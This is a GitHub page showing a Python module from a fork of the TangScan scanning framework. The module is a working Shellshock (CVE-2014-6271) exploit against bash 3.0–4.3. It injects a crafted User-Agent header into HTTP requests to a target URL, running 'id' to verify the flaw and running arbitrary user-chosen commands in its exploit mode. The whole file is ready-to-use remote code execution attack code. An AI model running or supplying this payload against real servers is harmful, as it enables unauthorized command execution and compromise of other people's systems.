forked from WooYun/TangScan
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathbash_remote_code_execute.py
113 lines (95 loc) · 3.53 KB
/
bash_remote_code_execute.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import re
from thirdparty import requests
from modules.exploit import TSExploit
__all__ = ['TangScan']
class TangScan(TSExploit):
def __init__(self):
super(self.__class__, self).__init__()
self.info = {
"name": "bash 远程代码执行漏洞",
"product": "bash",
"product_version": "3.0-4.3",
"desc": """
bash 3.0-4.3 存在一个漏洞,该漏洞可以通过构造环境变量的值来执行任意的脚本代码
""",
"license": self.license.TS,
"author": ["wooyun"],
"ref": [
{self.ref.url: "https://www.invisiblethreat.ca/2014/09/cve-2014-6271/"},
],
"type": self.type.rce,
"severity": self.severity.high,
"privileged": False,
"disclosure_date": "2014-09-17",
"create_date": "2014-09-17"
}
self.register_option({
"url": {
"default": "",
"required": True,
"choices": [],
"convert": self.convert.url_field,
"desc": "target url"
},
"cmd": {
"default": "id",
"required": False,
"choices": [],
"convert": self.convert.str_field,
"desc": "command"
}
})
self.register_result({
"status": False,
"data": {
'cmd_info': {
'cmd': '',
'output': ''
}
},
"description": "",
"error": ""
})
def verify(self):
re_pattern = re.compile(r'~~~(.*?)~~~', re.IGNORECASE | re.DOTALL | re.MULTILINE)
exp_headers = {'user-agent': r'''() { :; }; echo; echo ~~~`id`~~~'''}
try:
response = requests.get(self.option.url, headers=exp_headers, verify=False)
except Exception, e:
self.result.error = str(e)
return
re_result = re_pattern.findall(response.content)
if not response.content.startswith('~~~') or not re_result:
return
self.result.status = True
self.result.data.cmd_info.output = re_result[0]
self.result.description = "目标 {url} 存在 bash 远程代码执行漏洞, 执行 id 命令结果: {cmd_info}".format(
host=self.option.url,
cmd_info=re_result[0]
)
def exploit(self):
re_pattern = re.compile(r'~~~(.*?)~~~', re.IGNORECASE | re.DOTALL | re.MULTILINE)
exp_headers = {
'user-agent': '() {{ :; }}; echo; echo ~~~`{command}`~~~'.format(command=self.option.cmd)
}
try:
response = requests.get(self.option.url, headers=exp_headers, verify=False)
except Exception, e:
self.result.error = str(e)
return
re_result = re_pattern.findall(response.content)
if not response.content.startswith('~~~') or not re_result:
return
self.result.status = True
self.result.data.cmd_info.cmd = self.option.cmd
self.result.data.cmd_info.output = re_result[0]
self.result.description = "目标 {url} 存在 bash 远程代码执行漏洞, 执行 {cmd} 命令结果: {cmd_info}".format(
host=self.option.url,
cmd=self.option.cmd,
cmd_info=re_result[0]
)
if __name__ == '__main__':
from modules.main import main
main(TangScan())